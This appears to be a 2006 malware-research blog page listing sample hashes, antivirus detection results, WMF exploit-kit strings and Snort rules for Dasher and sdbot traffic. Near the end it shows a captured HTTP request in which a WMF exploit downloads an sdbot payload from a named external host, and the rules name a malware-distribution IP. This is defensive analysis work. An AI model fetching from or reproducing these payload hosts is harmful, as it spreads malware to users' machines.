Malware

Adware.BBuddy-14

Scanning -> C:\malware\installer_SIAC.exe
#################################
FILE TYPE: MS-DOS executable (EXE), OS/2 or MS Windows
MD5SUM: 40a12114f3c68f38eaf39c01b29a02f3
SHA1SUM: 9ed9267487e85e565af5cb2f0bdfc72a796d887c
SHA256SUM: e4537ce1f08dd7b66c9bf89f0219a73627ea3922b0be5dfa7cb7533ae12c601c
A/V SCAN: Adware.BBuddy-14
PACKER: none
#################################

Dialer-306

Scanning -> C:\malware\gdnUS333.exe
#################################
FILE TYPE: MS Windows PE 32-bit Intel 80386 GUI executable not relocatable
MD5SUM: fec0e03b377480e204d3a3b3d94321e6
SHA1SUM: 45dcd1ab95ca0162ab2f5a5ab46492a1c3d2159b
SHA256SUM: 1067b44eaa8ad81e1834e02490b88a02069f3160de570971df3b76f1bb7dcda0
A/V SCAN: Dialer-306
PACKER: none
#################################

wmf construction kit

Thanks to one of our users we have a copy of the wmf construction kit.

There are lots of really obvious signatures from this kit, so I find it less than useful. Metasploit is not that hard to use, c'mon!

00041A10 00443610 0 c:/mnt/samo/mingw/msys/mthr_stub.c

0003E402 00440002 0 Have fun
0003E41A 0044001A 0 ApacheEatsGnu
0003E432 00440032 0 ------visit www.egocrew.de-----
0003E454 00440054 0 Exploit by Metasploit Framework
0003E475 00440075 0 %s

This stuff is retained by the actual wmf files it outputs.

Another modern classic: Virus.Win9x.CIH

This was a pretty widespread and nasty virus years ago that would flash the BIOS of the host machine with garbage on April 26.

MD5: 862582b7072427a095aaac9c6a93f81f
SHA1: 62c1895018a7b521504f6531e1e4f56ba15cec01

AntiVir Found CIH #1
ArcaVir Found W95.CIH.1003
Avast Found Win95:CIH 1.x
AVG Antivirus Found Win32/CIH
BitDefender Found Trojan.Win95.Flashkiller
ClamAV Found CIH.2
Dr.Web Found nothing
F-Prot Antivirus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found nothing
NOD32 Found nothing
Norman Virus Control Found nothing
UNA Found nothing
VBA32

Trojan.Win32.Kuang

For the love of the old school and keeping it real, I've run some older malware through some modern AV/MW detection software. Interesting results:

MD5: 4ea8483c238bdb7fb8daea13b0b61530
SHA1: 9991b460b4724334828c4dac6ca1d3eabb06df3e

AntiVir Found nothing
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found W95/Weird
BitDefender Found nothing
ClamAV Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found Email-Flooder.Win32.Weirder (probable variant)
NOD32 Found nothing
Norman Virus Control

Win32.Klone.b analysis

Just another downloader, fully reversed into C code. I picked it up a few days ago and sent it to AVs, so most of them have signatures by now:

MD5: ec9dfa116b8f41e3918ec45a26597495

AntiVir Found nothing
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found Klone
BitDefender Found GenPack:Trojan.Downloader.Galapoper.A
ClamAV Found nothing
Dr.Web Found Trojan.Galapoper
F-Prot Antivirus Found nothing
Fortinet Found W32/KlonePacked.B-tr
Kaspersky Anti-Virus Found Packed.Win32.Klone.b
NOD32 Found probably a variant of Win32/TrojanDownloader.Small.AVT (probable variant)

Snort Rules for Detecting Dasher, sdbot, and bad netblocks

alert tcp $HOME_NET any -> $EXTERNAL_NET 6667 (content:"rain357"; nocase; msg:"[OFFENSIVE COMPUTING]Dasher variant phoning home to IRC server";sid:66600001;rev:1;)

alert tcp $HOME_NET 5262 -> $EXTERNAL_NET any (flags:S;msg:"[OFFENSIVE COMPUTING]Dasher Variant SYN scanning home";sid:66600002;rev:1;)

alert tcp $HOME_NET any -> 212.27.63.117 80 (msg:"[OFFENSIVE COMPUTING] HTTP connection to known malware provider for WMF exploit";sid:66600003;rev:1;)

alert tcp $HOME_NET any -> 212.27.63.117 80 (msg:"[OFFENSIVE COMPUTING] HTTP connection to known malware provider downloading sdbot05b.jpg for WMF exploit";content:"sdbot05b.jpg";nocase;sid:66600004;rev:1;)

More wmf files

I have some wmf exploit files.

Dasher Variant Traffic, Known WMF provider, and traffic to bad netblocks
more win_wmf

Thanks to seville we have more wmf stuff. These go out to a site and download a new file.
Here's some pretty pictures:

So sdbot05b.jpg gets turned into command.pif

GET /sdbot05b.jpg HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: charmedmadgic.free.fr
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Mon, 02 Jan 2006 05:24:45 GMT